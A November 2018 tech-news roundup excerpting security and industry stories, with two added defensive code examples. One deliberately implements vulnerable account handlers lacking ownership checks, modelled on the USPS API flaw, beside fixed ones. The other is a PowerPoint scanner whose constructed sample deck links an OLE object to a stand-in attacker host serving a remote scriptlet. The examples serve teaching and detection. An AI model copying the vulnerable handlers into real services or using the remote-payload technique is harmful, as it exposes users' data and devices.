Supplier Report: 11/30/2018

The haze of Thanksgiving and Black Friday is wearing off and several companies have found themselves with security issues.

Amazon, Venmo (PayPal), the United States Postal Service, and Microsoft have all been dealing with potential bugs and vulnerabilities (at various levels of severity).

Facebook continues to have exposure to social vulnerabilities – and things are getting tense: Sheryl Sandberg is rumored to be fearing for her job, but Mark Zuckerberg says she isn’t going anywhere (for now).

Artificial Intelligence

  • Lab-Grown Mini-Brains Spontaneously Produced ‘Human-Like’ Brain Waves for the First Time

    After the brain organoids had been growing in petri dishes for about six months, the researchers noticed that the electrical activity they were measuring was occurring at a higher rate than had ever been documented before in lab-grown organoids. Even more surprising, however, was that this electrical activity didn’t resemble the synchronized activity seen in mature human brains. Instead, the electrical patterns were chaotic, a hallmark of a developing brain.

    When Muotri and his colleagues compared the organoids’ electrical activity to that seen in premature babies, they found that it was strikingly similar to the patterns seen in babies born 25-39 weeks after conception.

    https://motherboard.vice.com/en_us/article/a3meza/lab-grown-mini-brains-spontaneously-produced-human-like-brain-waves-for-the-first-time

Cloud

  • Google’s cloud business under Greene was plagued by internal clashes, missed acquisitions, insiders say

    Google’s lack of big deals has puzzled analysts given how aggressive the major software vendors have been at opening their wallets to win in the cloud. In two of the year’s biggest deals — IBM’s $34 billion purchase of Red Hat and Microsoft’s $7.5 billion acquisition of GitHub — Google was involved in talks but ultimately came up short, according to people familiar with the matter.

    Greene wanted to buy GitHub but Pichai was less enthusiastic, unclear why Google would spend big money to get into the market for developer tools, said a person close to the business. Google’s bid for GitHub, whose cloud software lets programmers collaborate and share code, came in at just under $6 billion, and it declined to raise the price after being told of Microsoft’s offer, the person said.

    https://www.cnbc.com/2018/11/21/google-cloud-plagued-by-internal-clashes-in-its-effort-to-catch-amazon.html

Security

  • Venmo Caught Off Guard by Fraudsters

    In the first three months of 2018, the digital money-transfer service owned by PayPal Holdings Inc. recorded an operating loss of about $40 million—nearly 40% larger than the loss for which the company had budgeted, according to internal documents reviewed by The Wall Street Journal.

    Expenses related to fraudulent transactions were a big factor. The so-called transaction loss rate, which includes losses related to fraudulent charges, rose from about 0.25% of overall Venmo volume in January to 0.40% in March. The company had been shooting for a rate of roughly 0.24% in those periods, according to the documents.

    https://www.wsj.com/articles/venmo-caught-off-guard-by-fraudsters-1543068120?ns=prod/accounts-wsj

  • USPS took a year to fix a vulnerability that exposed all 60 million users’ data

    The vulnerability included all 60 million user accounts on the website. It was caused by an authentication weakness in the site’s application programming interface (API) that allowed anyone to access a USPS database offered to businesses and advertisers to track user data and packages. The API should have verified whether an account had permissions to read user data but USPS didn’t have such controls in place.

    Users’ personal data, including emails, phone numbers, and mailing campaign data, were all exposed to anyone who was logged into the site. Additionally, any user could request account changes for another user, so they could potentially change another account’s email address and phone number, although USPS does at least send a confirmation email to confirm the changes.

    https://www.theverge.com/2018/11/22/18107945/usps-postal-service-data-vulnerability-security-patch-60-million-users
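    The USPS flaw above is a missing object-level authorization check: the API confirmed the caller was logged in, then served or modified whatever account id it was handed. The following is an added example written for this report, not USPS code; it uses a constructed in-memory account table and hypothetical handler names to show the vulnerable read and change handlers beside hardened versions that tie every record access to the caller’s own identity.

```python
"""Object-level authorization on an account API: the check the USPS API lacked,
shown as vulnerable handlers beside hardened ones. Added example with
constructed data; handler and table names are hypothetical, not USPS code."""
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Tuple


@dataclass
class Account:
    account_id: int
    email: str
    phone: str


def sample_db() -> Dict[int, Account]:
    """Constructed stand-in for the user table. Against the vulnerable handlers,
    a sequential account id is the only thing an attacker needs to guess."""
    return {
        101: Account(101, "alice@example.com", "555-0101"),
        102: Account(102, "bob@example.com", "555-0102"),
    }


class Unauthenticated(Exception):
    """No valid session at all."""


class Forbidden(Exception):
    """A valid session asked for a record that belongs to someone else."""


def require_login(db: Dict[int, Account], caller_id: int) -> None:
    """Authentication only: proves who the caller is, not what they may touch."""
    if caller_id not in db:
        raise Unauthenticated("no session")


def get_account_vulnerable(db: Dict[int, Account], caller_id: int, account_id: int) -> Account:
    """Weakness: being logged in is treated as authorization. Any caller can
    read any account simply by supplying its id."""
    require_login(db, caller_id)
    return db[account_id]


def get_account_fixed(db: Dict[int, Account], caller_id: int, account_id: int) -> Account:
    """Hardened: the requested record must belong to the caller. This per-object
    ownership check is what the USPS API should have performed."""
    require_login(db, caller_id)
    if account_id != caller_id:
        raise Forbidden(f"account {caller_id} may not read account {account_id}")
    return db[account_id]


def update_contact_vulnerable(db: Dict[int, Account], caller_id: int, account_id: int,
                              email: Optional[str] = None, phone: Optional[str] = None) -> Account:
    """Weakness: any user can request a change to another user's contact details.
    A confirmation email limits the damage but does not close the hole."""
    require_login(db, caller_id)
    acct = db[account_id]
    if email:
        acct.email = email
    if phone:
        acct.phone = phone
    return acct


def update_contact_fixed(db: Dict[int, Account], caller_id: int, account_id: int,
                         email: Optional[str] = None, phone: Optional[str] = None) -> Account:
    """Hardened: reject the change before touching the record unless the
    caller is the account owner."""
    require_login(db, caller_id)
    if account_id != caller_id:
        raise Forbidden(f"account {caller_id} may not modify account {account_id}")
    acct = db[account_id]
    if email:
        acct.email = email
    if phone:
        acct.phone = phone
    return acct


def attempt(handler: Callable, *args) -> Tuple[str, str]:
    """Run a handler and report the outcome as data so the vulnerable and fixed
    handlers can be compared over the same requests."""
    try:
        return ("ok", handler(*args).email)
    except Forbidden:
        return ("forbidden", "")
    except Unauthenticated:
        return ("unauthenticated", "")


if __name__ == "__main__":
    db = sample_db()
    # Alice (101) probes Bob's (102) record through both handlers.
    print("read   vulnerable:", attempt(get_account_vulnerable, db, 101, 102))
    print("read   fixed     :", attempt(get_account_fixed, db, 101, 102))
    print("update vulnerable:", attempt(update_contact_vulnerable, db, 101, 102, "evil@example.com"))
    print("update fixed     :", attempt(update_contact_fixed, db, 101, 102, "evil@example.com"))
```

    The hardened handlers compare the target id to the session's identity on every request rather than once at login; in a real service the same rule applies to any lookup key a client can supply, including search filters and bulk tracking queries.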

  • Amazon leaks users’ names and emails in ‘technical error’

    When contacted for comment, Amazon said that neither its website nor any of its systems had been breached and that it has “fixed the issue and informed customers who may have been impacted.” It did not reveal the number of accounts affected or which countries the users are located in. Twitter users across Europe and the United States have reported receiving the email, and forum posts suggest that the error affected consumer rather than business accounts on the platform.

    Characterizing this as a “technical error” means that the incident is unlikely to be related to reports of Amazon firing employees for sharing customer emails with third-party sellers, but the lack of information makes it difficult to establish exactly what happened. We have reached out to the UK’s Information Commissioner’s Office, which Amazon would have needed to inform in the event of a breach, for comment.

    https://www.theverge.com/2018/11/21/18106306/amazon-email-address-leak-technical-error-phishing

  • Hackers May Exploit Microsoft PowerPoint For Malware Attacks

    As explained, the malicious file involved in this attack method appears to have a blank page, but secretly connects to a malicious link. Ramilli analyzed the slide structure and noticed an external OLEobject. Upon further analysis, he found the target device already infected by the file downloaded on the system, that is, wraeop.sct. After this step, stage 3 of the attack begins that utilises an internal image to execute additional code leading to stage 4 – the payload execution.

    The researcher suspects the malware to be AzoRult after performing traffic analysis and considering the C&C admin.

    https://latesthackingnews.com/2018/11/18/hackers-may-exploit-microsoft-powerpoint-for-malware-attacks/
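    The tell in Ramilli's analysis is a slide whose relationships point at an OLE object outside the package, which PowerPoint fetches from the URL when the slide renders. The following is an added example for this report, not the researcher's tooling or the malicious file: it builds a constructed .pptx in memory (placeholder host and path, not the real download location) and scans each slide's relationship part for external OLE object links.

```python
"""Flag PowerPoint decks whose slides link to an external OLE object.
Added example for the Ramilli analysis above; the sample deck, host and
path below are constructed placeholders, not the file from the article."""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

# Namespaces and relationship types defined by Office Open XML (ECMA-376).
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
IMAGE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"


def find_external_links(pptx_bytes: bytes) -> List[Dict[str, str]]:
    """Return every slide relationship that points outside the package, except
    ordinary hyperlinks. An external oleObject is the pattern in the attack
    described: the slide looks blank, but the linked object (here a .sct
    scriptlet) is pulled from the Target URL when the slide is shown."""
    findings: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as pkg:
        for name in pkg.namelist():
            # Per-slide relationship parts live at ppt/slides/_rels/slideN.xml.rels
            if not (name.startswith("ppt/slides/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts (images, layouts) ship inside the zip
                rel_type = rel.get("Type", "")
                if rel_type == HYPERLINK_REL:
                    continue  # clickable URLs are normal and need a user click
                findings.append({
                    "part": name,
                    "rel_id": rel.get("Id", ""),
                    "type": rel_type.rsplit("/", 1)[-1],
                    "target": rel.get("Target", ""),
                    "verdict": ("external OLE object" if rel_type == OLE_OBJECT_REL
                                else "external non-hyperlink relationship"),
                })
    return findings


def build_sample_pptx() -> bytes:
    """Constructed deck: one slide carrying an OLE object whose relationship
    targets a remote URL, plus a benign embedded image that must not be flagged."""
    slide_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" '
        'xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<p:cSld><p:spTree><p:graphicFrame><a:graphic>'
        '<a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">'
        '<p:oleObj r:id="rId2" progId="Package"/>'
        '</a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld></p:sld>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{IMAGE_REL}" Target="../media/image1.png"/>'
        f'<Relationship Id="rId2" Type="{OLE_OBJECT_REL}" '
        'Target="http://attacker.invalid/stage2.sct" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("ppt/slides/slide1.xml", slide_xml)
        pkg.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
        pkg.writestr("ppt/media/image1.png", b"\x89PNG\r\n\x1a\n")  # placeholder bytes
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_external_links(build_sample_pptx()):
        print(hit)
```

    Because the check reads only the package's relationship parts, it runs on untrusted files without rendering them; point `find_external_links` at the bytes of any .pptx from mail quarantine and treat a hit on an external oleObject as worth a sandbox detonation.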

Software/SaaS

  • Red Hat to be ‘Switzerland’ within IBM

    According to Marco Bill-Peter, Red Hat senior vice president of customer experience and engagement, Red Hat will function as an independent, distinct unit within IBM’s Hybrid Cloud team and maintain its commitment to open source principles.

    https://www.computerworld.com.au/article/649888/red-hat-switzerland-within-ibm/

  • Red Hat Says IBM Acquisition Won’t Change Its Culture — But Can It Change Theirs?

    “There is a commitment from them and a commitment from us as well: we stay true to open source. The other one is [Red Hat will] operate as an independent distinct unit and preserve our unique culture.”

    Significantly changing its culture could cause many of Red Hat’s 13,000 employees to leave, Bill-Peter said. It could also scare off long time partners like Amazon and Google from collaborating on “the next open hybrid cloud”. But Bill-Peter has little doubt IBM is committed to their independence.

    https://which-50.com/red-hat-says-ibm-acquisition-wont-change-its-culture-but-can-it-change-theirs/

Datacenter/Hardware

  • America’s nuclear arsenal relies on this brand-new supercomputer

    In an expansive white-tiled room in Livermore, California sits Sierra, the world’s second most powerful supercomputer. Sierra looks like an unassuming server farm, but is actually a massive connected hive of 190,000 processing cores. It was completed earlier this year, and has been on a shakedown cruise since then: researchers at the Lawrence Livermore National Laboratory ran astrophysics, climate, and precision medicine simulations on Sierra while ferreting out bad components and other technical hiccups.

    But early next year, Sierra’s real work will begin. The system will be “air gapped,” meaning that it will be disconnected from any external network to prevent unauthorized access. Once that happens, it can begin the calculations it was purpose-built to carry out: simulations of nuclear weapons launches and detonations.

    https://www.theverge.com/science/2018/11/20/18097534/nuclear-weapons-supercomputer-sierra-california-classified-stockpile-simulations

Other

  • With Facebook at ‘War,’ Zuckerberg Adopts More Aggressive Style

    Mr. Zuckerberg, who previously set annual goals such as to learn Mandarin and read 25 books, said this year he would focus on fixing Facebook. He believes this tougher management style is necessary to tackle challenges being raised both internally and externally, according to a person familiar with his thinking.

    Mr. Zuckerberg’s new posture could trouble those who feel his “move fast, break things” mantra from Facebook’s early days contributed to many of the company’s current problems. It also has led to confrontations with some of his top reports, including Ms. Sandberg, who has long had considerable autonomy over the Facebook teams that control communications and policy.

    https://www.wsj.com/articles/with-facebook-at-war-zuckerberg-adopts-more-aggressive-style-1542577980

  • Zuckerberg says stepping down at Facebook is ‘not the plan’

    Otherwise, he seemed unwilling to change his role or step down as leader of the company, and of COO Sandberg said “I hope we work together for decades more to come.” Separately, tonight TechCrunch reports that an internal memo showed outgoing policy head Elliot Schrage take responsibility for the company hiring Definers, a PR firm that spread negative publicity about competitors and pushed angles linking George Soros to critics. In the memo Schrage said Facebook did ask them to do work relating to Soros and that Definers reached out to members of the press showing that he funded some people who were critical of the company.

    https://www.engadget.com/2018/11/20/zuckerberg-says-stepping-down-at-facebook-is-not-the-plan/

Photo: Almos Bechtold